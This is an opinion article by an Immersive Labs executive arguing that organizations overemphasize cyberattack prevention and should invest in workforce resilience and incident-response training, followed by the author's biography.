Are cyber leaders focusing on the wrong things?

March 6, 2024
Cyber attacks aren’t a matter of “if” anymore, but a matter of “when.”

A pattern has emerged that is putting organizations at immense risk: cyber leaders are placing too much emphasis on before-the-incident preparation, and not enough on their teams’ after-incident response.

On the heels of the recent MGM cyberattack, large organizations are reminded just how devastating a simple breach can be for business, reputation, and the bottom line. Unfortunately, ransomware continues to run rampant, and such attacks have doubled in cost over the past two years. Clearly, cyber attacks aren’t a matter of “if” anymore, but a matter of “when.”

Prevention is overly prioritized, putting organizations at risk

The most recent proof point of this pattern comes from a recent study on cyber resilience, which found that the majority of cybersecurity focus across the MITRE ATT&CK framework falls in the earliest stages of the attack lifecycle. Unfortunately, this allocation of resources doesn’t suit organizations well because the framework of skills utilized by attackers increases throughout the cycle, and the abilities needed to prevent threats later in the framework also become more complex.

Across industries, we’re seeing cybersecurity leaders deploy tactics like cyber training and task forces to help their organizations prevent cyberattacks, but it’s worth noting that leaders should not overly rely on technology to detect and stop threats. Instead of focusing on stopping threats altogether, leaders should prioritize building cyber confidence and resilience for their entire workforce.

In an era when many security leaders spend too much time, money, and energy on prevention, we must shift strategies to investing in strategies that empower teams to respond faster and more confidently to emerging threats.

Cyber preparedness and resilience should be the focus

Cyber preparedness takes on two meanings: preparing to prevent attacks and preparing to handle attacks. As mentioned before, organizations that are focused on preventative efforts through technology and early-stage training are missing a major opportunity for their organizations’ cybersecurity postures by not emphasizing the “prepare to handle” aspect.

The harsh truth about the cybersecurity world is that no matter what preventative tactics we employ, hackers are always going to be one step ahead of the “good guys.” Although we can’t confidently predict a hacker’s next move, we do know they’ll likely advance quicker than us, so it’s how quickly we can react and mitigate crises that matters – which takes work.

Because experiencing a breach is more or less inevitable, organizations must implement training and resources to strengthen the cyber resilience of the workforce before, during, and especially after an incident. For instance, while looking at the MITRE ATT&CK kill chain, ensuring employees’ abilities to detect attackers’ efforts to establish persistence in the environment is critical to building resilience and lessening attackers’ success rates.

The stronger the cyber resilience of the workforce, the better suited they are to prepare for – and respond to – persistent cyber threats. 

How organizations can implement this approach

Just like any skill in or out of the workplace, cyber leaders should continuously exercise their employees against realistic and emerging threat scenarios. Attackers move quickly, so upskilling must match that pace as much as possible. These trainings can come in many forms, including gamified exercises, and should be engaging, timely, and consistent. Leaders should avoid implementing one-off cyber skilling fire drills that are largely ineffective.

As part of these trainings, organizational leaders should find a way to assess and identify skills gaps in their team and implement the appropriate tools to help upskill teams. Although there are plenty of great technological tools to help in the detection and mitigation of threats, the human element is mission-critical. 

Additionally, cyber resilience must become a Board- and C-level priority. As noted above, breaches can be incredibly costly, and recognizing their importance and integrating preparedness into the highest levels of the decision-making processes across an organization will eliminate risks.

To that end, this priority will ultimately build a rock-solid cybersecurity culture across the workforce where all employees understand and prioritize cybersecurity, promoting best practices, and encouraging shared responsibility for protecting people and assets.

Prevention isn’t impossible, but it’s also not a solid strategy for protecting data. Organizations must build cyber resilience with thoughtful, engaging cyber exercises that strengthen the workforce’s ability to handle a cyberattack at any point throughout the threat cycle – not just the beginning to ensure broad MITRE ATT&CK framework coverage.

 

 

Author Bio: Max Vetter, VP of Cyber for Immersive Labs

Max leads a team of cyber experts at Immersive Labs, helping customers stay ahead of the threats and be resilient against cyber attacks. Max spent seven years with London’s Metropolitan Police Service as a police officer, intelligence analyst, and covert internet investigator, including working in the money laundering unit in Scotland Yard. He also worked as Assistant Director of the ICC Commercial Crime Services investigating commercial crime, fraud, and serious organised crime groups.

Before joining Immersive Labs Max spent three years training the private sector and government agencies including the UK’s GCHQ and its cyber summer school in ethical hacking and open source intelligence and was the subject matter expert in darknets and cryptocurrencies.

About the Author

Max Vetter | Chief Cyber Officer at Immersive Labs

Max Vetter currently serves as Chief Cyber Officer at Immersive Labs. Before joining Immersive Labs, Max spent seven years working with the Metropolitan Police Service. He worked as a police officer, intelligence analyst and covert internet investigator, while also spending time in Scotland Yard's money laundering unit. Max also worked with the Commercial Crime Services and Federation Against Copyright Theft, investigating commercial crime, fraud and serious organized crime groups. After leaving the police force, Max trained the private sector and government agencies in ethical hacking and open-source intelligence, specializing in darknets and cryptocurrencies.